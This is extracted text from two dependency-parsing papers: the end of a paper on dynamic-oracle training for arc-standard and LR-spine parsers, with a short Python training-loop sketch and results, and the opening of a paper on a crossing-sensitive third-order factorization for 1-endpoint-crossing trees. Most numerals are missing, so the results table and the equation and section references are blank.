in case there exists a gold arc in tg connecting a node from lsa to r(σl[i + ]), we choose the transition lak, k ∈ [ , |lsa|], that creates such arc. in case such gold arc does not exists, we choose the transition lak with the maximum possible value of k, that is, k = |lsa|. we therefore explore only one of the several pos- sible ways of combining these two trees by means of a left-arc transition. we remark that the above strategy is safe. in fact, in case the gold arc exists, no other gold arc can ever involve the nodes of lsa eliminated by lak (see the definition in § . ), because arcs can not cross each other. in case the gold arc does not exist, our choice of k = |lsa| guarantees that we do not eliminate any element from lsa. once a transition lak is chosen, as described above, the reduction is performed and the spine pair (ls, rs) for the resulting tree is computed from (lsa, rsa) and (lsb, rsb), as defined in § . . at the same time, the loss of the resulting tree is com- puted, on the basis of the loss t [i,j](lsa, rsa), the loss of tree t(σl[i + ]), and a kronecker-like func- tion defined below. this loss is then used to update t [i + ,j](ls, rs). let ta and tb be two trees that must be combined in such a way that tb becomes the dependent of some node in one of the two spines of ta. let also pa = (lsa, rsa) and pb = (lsb, rsb) be spine pairs for ta and tb, respectively. recall that ag is the set of arcs of tg. the new kronecker-like function for the computation of the loss is defined as δg(pa,pb) =    , if r(ta) < r(tb)∧ ∃k[(rska → r(tb)) ∈ ag]; , if r(ta) > r(tb)∧ ∃k[(lska → r(tb)) ∈ ag]; , otherwise. . efficiency improvement the algorithm in § . has an exponential behaviour. to see why, consider trees in t [i,j]. these trees are produced by the combination of trees in t [i− ,j] with tree t(σl[i]), or by the combination of trees in t [i,j − ] with tree t(σr[j]). since each combin- ation involves either a left-arc or a right-arc trans- ition, we obtain a recursive relation that resolves into a number of trees in t [i,j] bounded by i+j− . we introduce now two restrictions to the search space of our extended algorithm that result in a huge computational saving. for a spine s, we write n(s) to denote the set of all nodes in s. we also let ∆i,j be the set of all pairs (ls, rs) such that t [i,j](ls, rs) = +∞. • every time a new pair (ls, rs) is created in ∆[i,j], we remove from ls all nodes different from the root that do not have gold dependents in {r(σl[k]) | k < i}, and we remove from rs all nodes different from the root that do not have gold dependents in {r(σr[k]) | k > j}. • a pair pa = (lsa, rsa) is removed from ∆[i,j] if there exists a pair pb = (lsb, rsb) in ∆[i,j] with the same root node as pa and with (lsa, rsa) = (lsb, rsb), such that n(lsa) ⊆ n(lsb), n(rsa) ⊆ n(rsb), and t [i,j](pa) ≥ t [i,j](pb). the first restriction above reduces the size of a spine by eliminating a node if it is irrelevant for the com- putation of the loss of the associated tree. the second restriction eliminates a tree ta if there is a tree tb with smaller loss than ta, such that in the computations of the parser tb provides exactly the same context as ta. it is not difficult to see that the above restrictions do not affect the correctness of the algorithm, since they always leave in our search space some tree that has optimal loss. a mathematical analysis of the computational complexity of the extended algorithm is quite in- volved. 
in figure , we plot the worst case size of t [i,j] for each value of j + i − , computed over all configurations visited in the training phase (see § ). we see that |t [i,j]| grows linearly with j + i− , leading to the same space requirements of algorithm . empirically, training with the dynamic i + j − m ax nu m be r of el em en ts figure : empirical worst case size of t [i,j] for each value of i + j − as measured on the penn treebank corpus. algorithm online training for greedy transition- based parsers : w ← : for k iterations do : shuffle(corpus) : for sentence w and gold tree tg in corpus do : c ← initial(w) : while not final(c) do : τp ← argmaxτ∈valid(c) w ·φ(c,τ) : τo ← argmaxτ∈oracle(c,tg) w·φ(c,τ) : if τp ∈ oracle(c,tg) then : w ← w + φ(c,τo) −φ(c,τp) : τ ← { τp if explore τo otherwise : c ← τ(c) return averaged(w) oracle is only about times slower than training with the oracle of sartorio et al. ( ) without exploring incorrect configurations. training we follow the training procedure suggested by goldberg and nivre ( ), as described in al- gorithm . the algorithm performs online learning using the averaged perceptron algorithm. a weight vector w (initialized to ) is used to score the valid transitions in each configuration based on a feature representation φ, and the highest scoring transition τp is predicted. if the predicted transition is not optimal according to the oracle, the weights w are updated away from the predicted transition and to- wards the highest scoring oracle transition τo. the parser then moves to the next configuration, by tak- ing either the predicted or the oracle transition. in the “error exploration” mode (explore is true), the parser follows the predicted transition, and other- wise the parser follows the oracle transition. note that the error exploration mode requires the com- pleteness property of a dynamic oracle. we consider three training conditions: static, in which the oracle is deterministic (returning a single canonical transition for each configuration) and no error exploration is performed; nondet, in which we use a nondeterministic partial oracle (sartorio et al., ), but do not perform error exploration; and ex- plore in which we use the dynamic oracle and per- form error exploration. the static setup mirrors the way greedy parsers are traditionally trained. the nondet setup allows the training procedure to choose which transition to take in case of spurious ambigu- ities. the explore setup increases the configuration space explored by the parser during training, by ex- posing the training procedure to non-optimal con- figurations that are likely to occur during parsing, together with the optimal transitions to take in these configurations. it was shown by goldberg and nivre ( ; ) that the nondet setup outperforms the static setup, and that the explore setup outperforms the nondet setup. experimental evaluation datasets performance evaluation is carried out on conll multilingual dataset, as well as on the penn treebank (ptb) (marcus et al., ) conver- ted to stanford basic dependencies (de marneffe et al., ). for the conll datasets we use gold part-of-speech tags, while for the ptb we use auto- matically assigned tags. as usual, the ptb parser is trained on sections - and tested on section . setup we train labeled versions of the arc-stand- ard (std) and lr-spine (lrs) parsers under the static, nondet and explore setups, as defined in § . 
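A minimal sketch of the online training loop of Algorithm 2, with error exploration. The helper functions (initial, is_final, valid, apply, features, oracle) are assumed to be supplied by the parser and oracle implementations, and the averaging of the perceptron weights is omitted for brevity; this is an illustration, not the authors' code.

```python
import random

def train(corpus, oracle, features, initial, is_final, valid, apply,
          iterations=15, explore=True, seed=0):
    rng = random.Random(seed)
    w = {}                                     # sparse weight vector

    def score(feats):
        return sum(w.get(f, 0.0) for f in feats)

    for _ in range(iterations):
        rng.shuffle(corpus)
        for sentence, gold_tree in corpus:
            c = initial(sentence)
            while not is_final(c):
                # model prediction over all valid transitions
                pred = max(valid(c), key=lambda t: score(features(c, t)))
                # best-scoring transition among those the oracle allows
                allowed = oracle(c, gold_tree)
                best = max(allowed, key=lambda t: score(features(c, t)))
                if pred not in allowed:
                    # perceptron update towards the oracle transition
                    for f in features(c, best):
                        w[f] = w.get(f, 0.0) + 1.0
                    for f in features(c, pred):
                        w[f] = w.get(f, 0.0) - 1.0
                # error exploration: follow the (possibly wrong) prediction
                c = apply(pred if explore else best, c)
    return w
```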
in the nondet setup we use a nondeterministic partial oracle and in the explore setup we use the non- deterministic complete oracles we present in this pa- per. in the static setup we resolve oracle ambiguities and choose a canonic transition sequence by attach- ing arcs as soon as possible. in the explore setup, parser:train arabic basque catalan chinese czech english greek hungarian italian turkish ptb uas std:static . . . . . . . . . . . std:nondet . . . . . . . . . . . std:explore . . . . . . . . . . . lrs:static . . . . . . . . . . . lrs:nondet . . . . . . . . . . . lrs:explore . . . . . . . . . . . las std:static . . . . . . . . . . . std:nondet . . . . . . . . . . . std:explore . . . . . . . . . . . lrs:static . . . . . . . . . . . lrs:nondet . . . . . . . . . . . lrs:explore . . . . . . . . . . . table : scores on the conll dataset (including punctuation, gold parts of speech) and on penn tree bank (excluding punctuation, predicted parts of speech). label ‘std’ refers to the arc-standard parser, and ‘lrs’ refers to the lr-spine parser. each number is an average over runs with different randomization seeds. from the first round of training onward, we always follow the predicted transition (explore is true). for all languages, we deal with non-projectivity by skipping the non-projective sentences during train- ing but not during test. for each parsing system, we use the same feature templates across all lan- guages. the arc-standard models are trained for iterations and the lr-spine models for iterations, after which all the models seem to have converged. results in table we report the labeled (las) and unlabeled (uas) attachment scores. as expec- ted, the lr-spine parsers outperform the arc-stand- ard parsers trained under the same setup. training with the dynamic oracles is also beneficial: despite the arguable complexity of our proposed oracles, the trends are consistent with those reported by gold- berg and nivre ( ; ). for the arc-standard model we observe that the move from a static to a nondeterministic oracle during training improves the accuracy for most of languages. making use of the completeness of the dynamic oracle and moving to the error exploring setup further improve results. the only exceptions are basque, that has a small dataset with more than % of non-projective sen- tences, and chinese. for chinese we observe a re- duction of accuracy in the nondet setup, but an in- crease in the explore setup. for the lr-spine parser we observe a practically constant increase of performance by moving from our complete code, together with the description of the fea- ture templates, is available on the second author’s homepage. the static to the nondeterministic and then to the er- ror exploring setups. conclusions we presented dynamic oracles, based on dynamic programming, for the arc-standard and the lr- spine parsers. empirical evaluation on languages showed that, despite the apparent complexity of the oracle calculation procedure, the oracles are still learnable, in the sense that using these oracles in the error exploration training algorithm presented in (goldberg and nivre, ) considerably improves the accuracy of the trained parsers. our algorithm computes a dynamic oracle using dynamic programming to explore a forest of depend- ency trees that can be reached from a given parser configuration. for the arc-standard parser, the com- putation takes cubic time in the size of the largest of the left and right input stacks. 
dynamic program- ming for the simulation of arc-standard parsers have been proposed by kuhlmann et al. ( ). that al- gorithm could be adapted to compute minimum loss for a given configuration, but the running time is o(n ), n the size of the input string: besides being asymptotically slower by one order of magnitude, in practice n is also larger than the stack size above. acknowledgments we wish to thank the anonym- ous reviewers. in particular, we are indebted to one of them for two important technical remarks. the third author has been partially supported by miur under project prin no. lya rh . references marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed de- pendency parses from phrase structure parses. in pro- ceedings of the th international conference on lan- guage resources and evaluation (lrec), volume , pages – . yoav goldberg and joakim nivre. . a dynamic or- acle for arc-eager dependency parsing. in proc. of the th coling, mumbai, india. yoav goldberg and joakim nivre. . training deterministic parsers with non-deterministic oracles. transactions of the association for computational linguistics, . john e. hopcroft and jeffrey d. ullman. . intro- duction to automata theory, languages and compu- tation. addison-wesley, reading, ma. liang huang and kenji sagae. . dynamic program- ming for linear-time incremental parsing. in proceed- ings of the th annual meeting of the association for computational linguistics, july. marco kuhlmann, carlos gómez-rodrı́guez, and gior- gio satta. . dynamic programming algorithms for transition-based dependency parsers. in proceed- ings of the th annual meeting of the association for computational linguistics: human language techno- logies, pages – , portland, oregon, usa, june. association for computational linguistics. mitchell p. marcus, beatrice santorini, and mary ann marcinkiewicz. . building a large annotated cor- pus of english: the penn treebank. computational linguistics, ( ): – . joakim nivre, johan hall, sandra kübler, ryan mcdon- ald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on dependency parsing. in proceedings of emnlp-conll. joakim nivre. . an efficient algorithm for pro- jective dependency parsing. in proceedings of the eighth international workshop on parsing technolo- gies (iwpt), pages – , nancy, france. joakim nivre. . incrementality in deterministic de- pendency parsing. in workshop on incremental pars- ing: bringing engineering and cognition together, pages – , barcelona, spain. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguist- ics, ( ): – . francesco sartorio, giorgio satta, and joakim nivre. . a transition-based dependency parser using a dynamic parsing strategy. in proceedings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing. in proceedings of emnlp. a crossing-sensitive third-order factorization for dependency parsing a crossing-sensitive third-order factorization for dependency parsing emily pitler∗ google research th avenue new york, ny epitler@google.com abstract parsers that parametrize over wider scopes are generally more accurate than edge-factored models. 
for graph-based non-projective parsers, wider factorizations have so far im- plied large increases in the computational complexity of the parsing problem. this paper introduces a “crossing-sensitive” generaliza- tion of a third-order factorization that trades off complexity in the model structure (i.e., scoring with features over multiple edges) with complexity in the output structure (i.e., producing crossing edges). under this model, the optimal -endpoint-crossing tree can be found in o(n ) time, matching the asymp- totic run-time of both the third-order projec- tive parser and the edge-factored -endpoint- crossing parser. the crossing-sensitive third- order parser is significantly more accurate than the third-order projective parser under many experimental settings and significantly less accurate on none. introduction conditioning on wider syntactic contexts than sim- ply individual head-modifier relationships improves parsing accuracy in a wide variety of parsers and frameworks (charniak and johnson, ; mcdon- ald and pereira, ; hall, ; carreras, ; martins et al., ; koo and collins, ; zhang and nivre, ; bohnet and kuhn, ; martins et al., ). this paper proposes a new graph- based dependency parser that efficiently produces ∗the majority of this work was done while at the university of pennsylvania. the globally optimal dependency tree according to a third-order model (that includes features over grand- parents and siblings in the tree) in the class of - endpoint-crossing trees (that includes all projective trees and the vast majority of non-projective struc- tures seen in dependency treebanks). within graph-based projective parsing, the third- order parser of koo and collins ( ) has a run- time of o(n ), just one factor of n more expensive than the edge-factored model of eisner ( ). in- corporating richer features and producing trees with crossing edges has traditionally been a challenge, however, for graph-based dependency parsers. if parsing is posed as the problem of finding the op- timal scoring directed spanning tree, then the prob- lem becomes np-hard when trees are scored with a grandparent and/or sibling factorization (mcdonald and pereira, ; mcdonald and satta, ). for various definitions of mildly non-projective trees, even edge-factored versions are expensive, with edge-factored running times between o(n ) and o(n ) (gómez-rodrı́guez et al., ; pitler et al., ; pitler et al., ; satta and kuhlmann, ). the third-order projective parser of koo and collins ( ) and the edge-factored -endpoint- crossing parser described in pitler et al. ( ) have some similarities: both use o(n ) time and o(n ) space, using sub-problems over intervals with one exterior vertex, which are constructed using one free split point. the two parsers differ in how the exterior vertex is used: koo and collins ( ) use the exterior vertex to store a grandparent in- dex, while pitler et al. ( ) use the exterior ver- tex to introduce crossed edges between the point and transactions of the association for computational linguistics, ( ) – . action editor: joakim nivre. submitted / ; revised / ; published / . c© association for computational linguistics. projective -endpoint-crossing edge o(n ) o(n ) eisner ( ) pitler et al. ( ) cs-gsib o(n ) o(n ) koo and collins ( ) this paper table : parsing time for various output spaces and model factorizations. cs-gsib refers to the (crossing-sensitive) grand-sibling factorization described in this paper. the interval. 
this paper proposes merging the two parsers to achieve the best of both worlds – produc- ing the best tree in the wider range of -endpoint- crossing trees while incorporating the identity of the grandparent and/or sibling of the child in the score of an edge whenever the local neighborhood of the edge does not contain crossing edges. the crossing-sensitive grandparent-sibling -endpoint- crossing parser proposed here takes o(n ) time, matching the runtime of both the third-order pro- jective parser and of the edge-factored -endpoint- crossing parser (see table ). the parsing algorithms of koo and collins ( ) and pitler et al. ( ) are reviewed in section . the proposed crossing-sensitive factorization is de- fined in section . the parsing algorithm that finds the optimal -endpoint-crossing tree according to this factorization is described in section . the implemented parser is significantly more accurate than the third-order projective parser in a variety of languages and treebank representations (section ). section discusses the proposed approach in the context of prior work on non-projective parsing. preliminaries in a projective dependency tree, each subtree forms one consecutive interval in the sequence of input words; equivalently (assuming an artificial root node placed as either the first or last token), when all edges are drawn in the half-plane above the sen- tence, no two edges cross (kübler et al., ). two vertex-disjoint edges cross if their endpoints inter- leave. a -endpoint-crossing tree is a dependency tree such that for each edge, all edges that cross it share a common vertex (pitler et al., ). note that the class of projective trees is properly included within the class of -endpoint-crossing trees. to avoid confusion between intervals and edges, g h e = g h m + h m e (a) m is the child of h that e is descended from g h = g h + hm ss m (b) the edge ~ehm is added to the tree; s is m’s adjacent inner sibling = + hm h s r+ r msh (c) r is s’s outermost descendant; r + is m’s innermost descendant figure : algorithm for grand-sibling projective parsing; the figures replicate figure in koo and collins ( ). ~eij denotes the directed edge from i to j (i.e., i is the parent of j). interval notation ((i, j), [i, j], (i, j], or [i, j)) is used to denote sets of vertices between i and j, with square brackets indicating closed intervals and round brackets indicating open intervals. . grand-sibling projective parsing a grand-sibling factorization allows features over -tuples of (g, h, m, s), where h is the parent of m, g is m’s grandparent, and s is m’s adjacent in- ner sibling. features over these grand-sibling - tuples are referred to as “third-order” because they scope over three edges simultaneously (~egh, ~ehs, and ~ehm). the parser of koo and collins ( ) pro- duces the highest-scoring projective tree according to this grand-sibling model by adding an external grandparent index to each of the sub-problems used in the sibling factorization (mcdonald and pereira, ). figure in koo and collins ( ) provided a pictorial view of the algorithm; for convenience, it is replicated in figure . an edge ~ehm is added to the tree in the “trapezoid” step (figure b); this allows the edge to be scored conditioned on m’s grandpar- ent (g) and its adjacent inner sibling (s), as all four relevant indices are accessible. . edge-factored -endpoint-crossing parsing the edge-factored -endpoint-crossing parser of pitler et al. 
( ) produces the highest scoring - * which cars do americans ?daysfavor most these figure : a -endpoint-crossing non-projective english sentence from the wsj penn treebank (marcus et al., ), converted to dependencies with pennconverter (johansson and nugues, ). do americans favor do ?daysfavor most these * do * which cars do favor figure : constructing a -endpoint-crossing tree with intervals with one exterior vertex (pitler et al., ). endpoint-crossing tree with each edge ~ehm scored according to score(edge(h, m)). the -endpoint- crossing property allows the tree to be built up in edge-disjoint pieces each consisting of intervals with one exterior point that has edges into the interval. for example, the tree in figure would be built up with the sub-problems shown in figure . to ensure that crossings within a sub-problem are consistent with the crossings that happen as a result of combination steps, the algorithm uses four dif- ferent “types” of sub-problems, indicating whether the edges incident to the exterior point may be inter- nally crossed by edges incident to the left boundary point (l), the right (r), either (lr), or neither (n). in figure , the sub-problem over [*, do] ∪{favor} would be of type r, and [favor, ?]∪{do} of type l. . . naı̈ve approach to including grandparent features the example in figure illustrates the difficulty of incorporating grandparents into the scoring of all edges in -endpoint-crossing parsing. the vertex favor has a parent or child in all three of the sub- problems. in order to use grandparent scoring for the edges from favor to favor’s children in the other two sub-problems, we would need to augment the problems with the grandparent index do. we also must add the parent index do to the middle sub- problem to ensure consistency (i.e., that do is in fact the parent assigned). thus, a first attempt to score all edges with grandparent features within -endpoint- crossing trees raises the runtime from o(n ) to o(n ) (all of the four indices need a “predicted par- ent” index; at least one edge is always implied so one of these additional indices can be dropped). crossing-sensitive factorization factorizations for projective dependency parsing have often been designed to allow efficient pars- ing. for example, the algorithms in eisner ( ) and mcdonald and pereira ( ) achieve their ef- ficiency by assuming that children to the left of the parent and to the right of the parent are independent of each other. the algorithms of carreras ( ) and model in koo and collins ( ) include grandparents for only the outermost grand-children of each parent for efficiency reasons. in a similar spirit, this paper introduces a variant of the grand- sib factorization that scores crossed edges indepen- dently (as a crossededge part) and uncrossed edges under either a grandparent-sibling, grandparent, sib- ling, or edge-factored model depending on whether relevant edges in its local neighborhood are crossed. a few auxiliary definitions are required. for any parent h and grandparent g, h’s children are parti- tioned into interior children (those between g and h) and exterior children (the complementary set of chil- dren). interior children are numbered from closest to h through furthest from h; exterior children are first numbered on the side closer to h from closest to h through furthest, then the enumeration wraps around to include the vertices on the side closer to g. figure shows a parent h, its grandparent g, and a possible sequence of three interior and four exterior children. 
note that for a projective tree, there would not be any children on the far side of g. definition . let h be m’s parent. outer(m) is the set of siblings of m that are in the same subset of h’s children and are later in the enumeration than m is. for example, in the tree in figure , because dependency trees are directed trees, each node ex- cept for the artificial root has a unique parent. to ensure that grandparent is defined for the root’s children, assume an artifi- cial parent of the root for notational convenience. e e i i i hge e figure : the exterior children are numbered first begin- ning on the side closest to the parent, then the side closest to the grandparent. there must be a path from the root to g, so the edges from h to its exterior children on the far side of g are guaranteed to be crossed. crossed(~ehs) ¬crossed(~ehs) ¬gproj(~ehm) edge(h, m) sib(h, m, s) gproj(~ehm) grand(g, h, m) grandsib(g, h, m, s) table : part type for an uncrossed edge ~ehm for the crossing-sensitive third-order factorization (g is m’s grandparent; s is m’s inner sibling). outer(most) = {days, cars}. definition . an uncrossed edge ~ehm is gproj if both of the following hold: . the edge ~egh from h’s parent to h is not crossed . none of the edges from h to outer(m) (m’s outer siblings) are crossed uncrossed gproj edges include the grandparent in the part. the part includes the sibling if the edge ~ehs from the parent to the sibling is not crossed. ta- ble gives the factorization for uncrossed edges. the parser in this paper finds the optimal - endpoint-crossing tree according to this factorized form. a fully projective tree would decompose into exclusively grandsib parts (as all edges would be uncrossed and gproj ). as all projective trees are within the -endpoint-crossing search space, the optimization problem that the parser solves includes all projective trees scored with grand-sibling fea- tures everywhere. projective parsing with grand- sibling scores can be seen as a special case, as the crossing-sensitive -endpoint-crossing parser can simulate a grand-sibling projective parser by setting all crossed(h, m) scores to −∞. in figure , the edge from do to americans is not gproj because condition ( ) is violated, while the edge from favor to most is not gproj because condition ( ) is violated. under this definition, the vertices do and favor (which have children in mul- tiple sub-problems) do not need external grandpar- ent indices in any of their sub-problems. table crossededge(*,do) sib(cars, which, -) crossededge(favor,cars) sib(do, americans, -) sib(do, favor, americans) crossededge(do,?) sib(favor, most, -) sib(favor, days, most) gsib(favor, days, these, -) table : decomposing figure according to the crossing-sensitive third-order factorization described in section . null inner siblings are indicated with -. lists the parts in the tree in figure according to this crossing-sensitive third-order factorization. parsing algorithm the parser finds the maximum scoring -endpoint- crossing tree according to the factorization in sec- tion with a dynamic programming procedure rem- iniscent of koo and collins ( ) (for scoring un- crossed edges with grandparent and/or sibling fea- tures) and of pitler et al. ( ) (for including crossed edges). the parser also uses novel sub- problems for transitioning between portions of the tree with and without crossed edges. this formula- tion of the parsing problem presents two difficulties: . the parser must know whether an edge is crossed when it is added. . 
for uncrossed edges, the parser must use the appropriate part for scoring according to whether other edges are crossed (table ). difficulty is solved by adding crossed and un- crossed edges to the tree in distinct sub-problems (section . ). difficulty is solved by producing different versions of subtrees over the same sets of vertices, both with and without a grandparent index, which differ in their assumptions about the tree out- side of that set (section . ). the list of all sub- problems with their invariants and the full dynamic program are provided in the supplementary material. . enforcing crossing edges the parser adds crossed and uncrossed edges in distinct portions of the dynamic program. un- crossed edges are added only through trapezoid sub- problems (that may or may not have a grandpar- ent index), while crossed edges are added in non- trapezoid sub-problems. to add all uncrossed edges in trapezoid sub-problems, the parser (a) enforces that any edge added anywhere else must be crossed, and (b) includes transitional sub-problems to build trapezoids when the edge ~ehm is not crossed, but the edge to its inner sibling ~ehs is (and so the construc- tion step shown in figure b cannot be used). . . crossing conditions pitler et al. ( ) included crossing edges by using “crossing region” sub-problems over intervals with an external vertex that optionally contained edges between the interval and the external vertex. an uncrossed edge could then be included either by a derivation that prohibited it from being crossed or a derivation which allowed (but did not force) it to be crossed. this ambiguity is removed by enforcing that ( ) each crossing region contains at least one edge incident to the exterior vertex, and ( ) all such edges are crossed by edges in another sub-problem. for example, by requiring at least one edge between do and (favor, ?] and also between favor and (*, do), the edges in the two sets are guaranteed to cross. . . trapezoids with edge to inner sibling crossed to add all uncrossed edges in trapezoid-style sub- problems, we must be able to construct a trapezoid over vertices [h, m] whenever the edge ~ehm is not crossed. the construction used in koo and collins ( ), repeated graphically in figure a, cannot be used if the edge ~ehs is crossed, as there would then exist edges between (h, s) and (s, m), making s an invalid split point. the parser therefore includes some “transitional glue” to allow alternative ways to construct the trapezoid over [h, m] when ~ehm is not crossed but the edge ~ehs to m’s inner sibling is. the two additional ways of building trapezoids are shown graphically in figures b and c. con- sider the “chain of crossing edges” that includes the edge ~ehs. if none of these edges are in the subtree rooted at m, then we can build the tree involving m and its inner descendants separately (figure b) from the rest of the tree rooted at h. within the in- terval [h, e − ] the furthest edge incident to h (~ehs) must be crossed: these intervals are parsed choosing s and the crossing point of ~ehs simultaneously (as in figure in pitler et al. ( )). otherwise, the sub-tree rooted at m is involved in g h = g h + hm ss m (a) edge from h to inner sibling s is not crossed (re- peats figure b) g h = hm mh + ee− (b) ~ehs is crossed, but the chain of crossing edges involving ~ehs does not include any descendants of m. e is m’s descendant furthest from m within (h, m). s ∈ (h, e− ). 
h m + d = mg h h d (c) ~ehs is crossed, and the chain of crossing edges involving ~ehs includes descendants of m. of m’s de- scendants that are incident to edges in the chain, d is the one closest to m (d can be m itself). s ∈ (h, d). figure : ways to build a trapezoid when the edge ~ehs to m’s inner sibling may be crossed. the chain of crossing edges (figure c). the chain of crossing edges between h and d (m’s descendant, which may be m itself) is built up first then concate- nated with the triangle rooted at m containing m’s inner descendants not involved in the chain. chains of crossing edges are constructed by re- peatedly applying two specialized types of l items that alternate between adding an edge from the in- terval to the exterior point (right-to-left) or from the exterior point to the interval (left-to-right) (fig- ure ). the boundary edges of the chain can be crossed more times without violating the - endpoint-crossing property, and so the beginning and end of the chain can be unrestricted crossing regions. these specialized chain sub-problems are also used to construct boxes (figure c) over [s, m] with shared parent h when neither edge ~ehs nor ~ehm is crossed, but the subtrees rooted at m and at s cross each other (figure ). lemma . the grandsib-crossing parser adds all uncrossed edges and only uncrossed edges in a tree in a “trapezoid” sub-problem. proof. the only part is easy: when a trapezoid is built over an interval [h, m], all edges are internal to the interval, so no earlier edges could cross ~ehm. af- = + h s k s k + s k dh d di k x i d di k = + k k + x i x i d = + k k + x idx i = + i d x i d figure : constructing a chain of crossing edges h d m + h d m h me = h s m h s d = d e + figure : constructing a box when edges in m and s’s subtrees cross each other. ter the trapezoid is built, only the interval endpoints h and m are accessible for the rest of the dynamic program, and so an edge between a vertex in (h, m) and a vertex /∈ [h, m] can never be added. the crossing conditions ensure that every edge added in a non-trapezoid sub-problem is crossed. lemma . the grandsib-crossing parser con- siders all -endpoint-crossing trees and only - endpoint-crossing trees. proof. all trees that could have been built in pitler et al. ( ) are still possible. it can be verified that the additional sub-problems added all obey the - endpoint-crossing property. . reduced context in presence of crossings a crossed edge (added in a non-trapezoid sub- problem) is scored as a crossededge part. an uncrossed edge added in a trapezoid sub-problem, however, may need to be scored according to a grandsib, grand, sib, or edge part, depending on whether the relevant other edges are crossed. in this section we show that sibling and grandparent fea- tures are included in the grandsib-crossing parser as specified by table . do favor most these days (a) for good contexts favor most these daysdo (b) for bad contexts figure : for each of the interval sub-problems in koo and collins ( ), the parser constructs versions with and without the additional grandparent index. figure b is used if the edge from do to favor is crossed, or if there are any crossed edges from favor to children to the left of do or to the right of days. otherwise, figure a is used. . . sibling features lemma . the grandsib-crossing parser scores an uncrossed edge ~ehm with a sib or grandsib part if and only if ~ehs is not crossed. proof. 
whether the edge to an uncrossed edge’s in- ner sibling is crossed is known bottom-up through how the trapezoid is constructed, since the inner sib- ling is internal to the sub-problem. when ~ehs is not crossed, the trapezoid is constructed as in figure a, using the inner sibling as the split point. when the edge ~ehs is crossed, the trapezoid is constructed as in figure b or c; note that both ways force the edge to the inner sibling to be crossed. . . grandparent features for gproj edges koo and collins ( ) include an external grand- parent index for each of the sub-problems that the edges within use for scoring. we want to avoid adding such an external grandparent index to any of the crossing region sub-problems (to stay within the desired time and space constraints) or to inter- val sub-problems when the external context would make all internal edges ¬gproj . for each interval sub-problem, the parser con- structs versions both with and without a grandpar- ent index (figure ). which version is used de- pends on the external context. in a bad context, all edges to children within an interval are guaranteed to be ¬gproj . this section shows that all boundary points in crossing regions are placed in bad contexts, and then that edges are scored with grandparent fea- tures if and only if they are gproj . bad contexts for interval boundary points for exterior vertex boundary points, all edges from it to its children will be crossed (section . . ), so it does not need a grandparent index. lemma . if a boundary point i’s parent (call it g) is within a sub-problem over vertices [i, j] or [i, j]∪ {x}, then for all uncrossed edges ~eim with m in the sub-problem, the tree outside of the sub-problem is irrelevant to whether ~eim is gproj . proof. the sub-problem contains the edge ~egi, so condition ( ) is checked internally. m cannot be x, since ~eim is uncrossed. if g is x, then ~eim is ¬gproj regardless of the outer context. if both g and m ∈ (i, j], then outer(m) ⊆ (i, j]: if m is an interior child of i (m ∈ (i, g)) then outer(m) ⊆ (m, g) ⊆ (i, j]. otherwise, if m is an exterior child (m ∈ (g, j]), by the “wrapping around” definition of outer, outer(m) ⊆ (g, m) ⊆ (i, j]. thus condi- tion ( ) is also checked internally. we can therefore focus on interval boundary points with their parent outside of the sub-problem. definition . the left boundary vertex of an inter- val [i, j] is in a bad context (badcontextl(i, j)) if i receives its parent (call it g) from outside of the sub-problem and either of the following hold: . grand-edge crossed: ~egi is crossed . outer-child-edge crossed: an edge from i to a child of i outside of [i, j] and outer to j will be crossed (recall this includes children on the far side of g if g is to the left of i) badcontextr(i, j) is defined symmetrically regard- ing j and j’s parent and children. corollary . if badcontextl(i, j), then for all ~eim with m ∈ (i, j], ~eim is ¬gproj . similarly, if badcontextr(i, j), for all ~ejm with m ∈ [i, j), ~ejm is ¬gproj . no grandparent indices for crossing regions we would exceed the desired o(n ) run-time if any crossing region sub-problems needed any grand- parent indices. in pitler et al. ( ), lr sub- problems with edges from the exterior point crossed by both the left and the right boundary points were constructed by concatenating an l and an r sub- problem. 
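returning to the factorization table above, the choice of scoring part for an edge depends only on which neighboring edges are crossed: crossed edges are scored in isolation, and uncrossed edges include grandparent context only when gproj holds and sibling context only when the edge to the inner sibling is uncrossed. the sketch below is an illustrative summary of that table, not the paper's implementation; the function and argument names are invented, and the gproj test is shown over precomputed crossing flags.

```python
# Illustrative summary (not the paper's code) of the crossing-sensitive
# third-order factorization for scoring a single edge from h to m.

def is_gproj(grand_edge_crossed, outer_sibling_edges_crossed):
    """gproj: the edge from h's parent to h is uncrossed and no edge from h
    to one of m's outer siblings is crossed."""
    return not grand_edge_crossed and not any(outer_sibling_edges_crossed)

def part_for_edge(edge_crossed, sib_edge_crossed, gproj, g, h, m, s):
    """Return the part type and indices used to score the edge from h to m."""
    if edge_crossed:
        return "crossededge", (h, m)
    if gproj and not sib_edge_crossed:
        return "grandsib", (g, h, m, s)
    if gproj:
        return "grand", (g, h, m)
    if not sib_edge_crossed:
        return "sib", (h, m, s)
    return "edge", (h, m)
```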
since the split point was not necessar- ily incident to a crossed edge, the split point might have gproj edges to children on the side other than where it gets its parent; accommodating this would add another factor of n to the running time and space x k jx i j = + kix figure : for all split points k, the edge from k’s parent to k is crossed, so all edges from k to children on either side were ¬gproj . the case when the split point’s parent is from the right is symmetric. x i k j (a) x is outer to all children of k in (k, j]. x i k j (b) x is outer to all children of k in [i, k). figure : the edge ~ekx is guaranteed to be crossed, so k is in a badcontext for whichever side it does not get its parent from. to store the split point’s parent. to avoid this in- crease in running time, they are instead built up as in figure , which chooses the split point so that the edge from the parent of the split point to it is crossed. lemma . for all crossing region sub-problems [i, j] ∪ {x} with i’s parent /∈ [i, j] ∪ {x}, badcontextl(i, j). similarly, when j’s parent /∈ [i, j]∪{x}, badcontextr(i, j). proof. crossing region sub-problems either com- bine to form intervals or larger crossing regions. when they combine to form intervals as in figure , it can be verified that all boundary points are in a bad context. lr sub-problems were discussed above. split points for the l/r/n sub-problems by construction are incident to a crossed edge to a fur- ther vertex. if that edge is from the split point’s par- ent to the split point, then the grand-edge is crossed and so both sides are in a bad context. if the crossed edge is from the split point to a child, then that child is outer to all other children on the side in which it does not get its parent (see figure ). corollary . no grandparent indices are needed for any crossing region sub-problem. triangles and trapezoids with and without grandparent indices the presentation that fol- lows assumes left-headed versions. uncrossed edges are added in two distinct types of trapezoids: ( ) trapg[h, m, g, l] with an external grandpar- ent index g, scores the edge ~ehm with 